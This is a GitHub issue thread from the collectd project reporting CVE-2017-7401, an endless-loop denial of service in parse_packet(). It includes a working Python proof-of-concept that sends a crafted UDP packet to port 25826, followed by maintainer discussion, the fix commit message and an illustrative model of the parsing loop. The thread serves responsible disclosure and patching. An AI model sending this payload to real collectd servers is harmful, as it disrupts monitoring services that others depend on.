Endless loop in parse_packet() while statement (CPU drain/DoS) #2174

Closed
marcinguy opened this issue Feb 13, 2017 · 4 comments

@marcinguy
commented Feb 13, 2017

  • Version of collectd: 5.7.1 (build from source)
  • Operating system / distribution:
    Linux laptop 4.4.0-62-generic #83-Ubuntu SMP Wed Jan 18 14:10:15 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux

Expected behavior

Working as usual

Actual behavior

After sending this payload, collectd seems to be entering endless while() loop in packet_parse consuming high CPU resources, possibly crash/gets killed after a while.

Tasks: 290 total, 2 running, 288 sleeping, 0 stopped, 0 zombie
%Cpu(s): 19,7 us, 32,8 sy, 0,0 ni, 47,1 id, 0,3 wa, 0,0 hi, 0,2 si, 0,0 st
KiB Mem : 7604408 total, 267056 free, 2153052 used, 5184300 buff/cache
KiB Swap: 7806972 total, 7528876 free, 278096 used. 4498796 avail Mem
PID USER PR NI VIRT RES SHR S %CPU %MEM TIME+ COMMAND
605 collectd 20 0 852496 5088 2700 S 62,5 0,1 0:57.17 collectd

Steps to reproduce

Below is a Python program that crafts the packet that causes this problem.

# dos.py  (Python 2 syntax: print statements and a str payload)

import socket

UDP_IP = "127.0.0.1"
UDP_PORT = 25826   # collectd network plugin default port

print "UDP target IP:", UDP_IP
print "UDP target port:", UDP_PORT

sock = socket.socket(socket.AF_INET,    # Internet
                     socket.SOCK_DGRAM) # UDP

payload="\x02\x00\x00\x40\x6c\x61\x70\x74\x6f\x70\x00\x05\x01\x00\x0c\x00\x00\x00\x00\x58\x9c\xc5\x59\x00\x02\x00\x08\x61\x6e\x79\x00\x00\x03\x00\x40\x00\x00\x04\x00\x0a\x67\x61\x75\x67\x65\x00\x00\x07\x00\x0c\x00\x00\x00\x00\x00\x00\x00\x0a\x00\x05\x00\x15\x63\x00\x00\x05\x00\x40\x40\x6c\x61\x70\x74\x6f\x70\x00\x05\x01\x00\x0c\x00\x00\x00\x00\x58\x9c\xc5\x59\x00\x02\x00\x08\x61\x6e\x79\x00\x00\x03\x00\x05\x00\x00\x04\x00\x0a\x67\x61\x75\x67\x65\x00\x00\x07\x00\x0c\x00\x00\x00\x00\x00\x00\x00\x0a\x00\x05\x00\x15\x00\x00\x05\x00\x42\x40\x6c\x61\x70\x74\x6f\x70\x00\x05\x01\x00\x0c\x00\x00\x00\x00\x58\x9c\xc5\x59\x00\x02\x00\x08\x61\x6e\x79\x00\x00\x03\x00\x05\x00\x00\x04\x00\x0a\x67\x61\x75\x67\x65\x00\x00\x07\x00\x0c\x00\x00\x00\x00\x00\x00\x00\x0a\x00\x05\x00\x15\x00\x00\x00\x00\x05\x00\x42\x40\x6c\x61\x70\x74\x6f\x70\x00\x05\x01\x00\x0c\x00\x00\x00\x00\x58\x9c\xc5\x59\x00\x02\x00\x08\x61\x6e\x79\x00\x00\x03\x00\x05\x00\x00\x04\x00\x0a\x67\x61\x75\x67\x65\x00\x00\x07\x00\x0c\x00\x00\x00\x00\x00\x00\x00\x0a\x00\x05\x00\x15\x00\x00\x00\x00\x06\x00\x33\x00\x50\x01\x00\x00\x00\x00\x00\x00\x10\x40\x01\x00\x00\x00\x00\x00\x00\x10\x40\x01\x00\x00\x00\x00\x00\x00\x10\x40\x01\x00\x00\x00\x00\x00\x00\x10\x40\x01\x00\x00\x00\x00\x00\x00\x10\x40"

sock.sendto(payload,(UDP_IP, UDP_PORT))

@marcinguy
Author

commented Feb 14, 2017

Narrowed it to a smaller packet, seems like this packet is also causing the issue.
packet

@marcinguy marcinguy changed the title Endless loop in parse_packet() while statement (CPU drain) Endless loop in parse_packet() while statement (CPU drain/DoS) Feb 18, 2017

@rpv-tomsk

Contributor

commented Apr 2, 2017

@octo, @rubenk - which versions are supported at the moment? Which branch should be chosen as a target branch to PR?

rpv-tomsk added a commit to rpv-tomsk/collectd that referenced this issue Apr 3, 2017

Fix endless loop DOS in parse_packet()
When correct 'Signature part' is received by Collectd, configured without
AuthFile option, condition for endless loop occurs due to missing increase
of pointer to next unprocessed part.

Closes: collectd#2174
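
A Python model of the part-walking loop the commit message describes, added here as an illustration and not code from collectd. The part-type values are collectd's; the signature handler, the `fixed` switch and the sample packet are constructed simplifications, and a progress check turns the spin into a returned status instead of a hang.

```python
import struct

# Part types of the collectd binary network protocol (from network.c)
TYPE_HOST, TYPE_PLUGIN, TYPE_SIGN_SHA256 = 0x0000, 0x0002, 0x0200
HEADER_LEN = 4    # u16 type + u16 length; the length field counts the header
SHA256_LEN = 32   # a signature part carries a 32-byte HMAC, then a username

def make_part(ptype, data):
    """Encode one part: big-endian type, big-endian total length, payload."""
    return struct.pack("!HH", ptype, HEADER_LEN + len(data)) + data

def sign_sha256_part(off, plen, userdb, fixed):
    """Simplified model of parse_part_sign_sha256(); returns the new cursor.
    Without an AuthFile (userdb is None) the part is accepted unverified. The
    vulnerable code returned success without moving the cursor, so the caller
    re-read the same part forever; the fix advances past the part."""
    if userdb is None:
        return off + plen if fixed else off
    return off + plen   # HMAC check not modelled; the part is consumed anyway

def parse_packet(buf, userdb=None, fixed=True):
    """Walk every part of a packet; returns (status, [(type, data), ...]).
    status is 'ok', 'malformed', or 'stuck' when a handler made no forward
    progress, which is the CVE-2017-7401 condition made visible."""
    parts, off = [], 0
    while off < len(buf):
        if len(buf) - off < HEADER_LEN:
            return "malformed", parts
        ptype, plen = struct.unpack_from("!HH", buf, off)
        if plen < HEADER_LEN or plen > len(buf) - off:
            return "malformed", parts
        if ptype == TYPE_SIGN_SHA256:
            if plen < HEADER_LEN + SHA256_LEN:
                return "malformed", parts
            new_off = sign_sha256_part(off, plen, userdb, fixed)
        else:
            parts.append((ptype, buf[off + HEADER_LEN:off + plen]))
            new_off = off + plen
        if new_off <= off:   # progress check: the real loop spins here
            return "stuck", parts
        off = new_off
    return "ok", parts

# Constructed sample: a signature part (placeholder all-zero HMAC + username)
# followed by two ordinary parts, as a server without AuthFile would see it.
SAMPLE = (make_part(TYPE_SIGN_SHA256, b"\x00" * SHA256_LEN + b"user")
          + make_part(TYPE_HOST, b"laptop\x00")
          + make_part(TYPE_PLUGIN, b"any\x00"))
```

Running `parse_packet(SAMPLE, fixed=False)` returns `stuck` with no parts decoded, while the fixed walk returns the host and plugin parts that follow the signature.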
@rpv-tomsk

Contributor

commented Apr 3, 2017

This issue has CVE-2017-7401 assigned.

rpv-tomsk added a commit to rpv-tomsk/collectd that referenced this issue Apr 3, 2017

Fix endless loop DOS in parse_packet()
When correct 'Signature part' is received by Collectd, configured without
AuthFile option, condition for endless loop occurs due to missing increase
of pointer to next unprocessed part.

Fixes: CVE-2017-7401
Closes: collectd#2174

@octo octo self-assigned this Apr 4, 2017

@octo octo added the Bug label Apr 4, 2017

@octo

Member

commented Apr 4, 2017

Thank you very much for reporting this, @marcinguy! I've merged Pavel's patch, hopefully fixing the issue.

Please send me an email (→ contact) so I can send you a collectd t-shirt!

Best regards,
—octo

@rubenk rubenk closed this in f6be4f9 Apr 14, 2017

rpv-tomsk added a commit to rpv-tomsk/collectd that referenced this issue Sep 21, 2017

Fix endless loop DOS in parse_packet()
When correct 'Signature part' is received by Collectd, configured without
AuthFile option, condition for endless loop occurs due to missing increase
of pointer to next unprocessed part.

Fixes: CVE-2017-7401
Closes: collectd#2174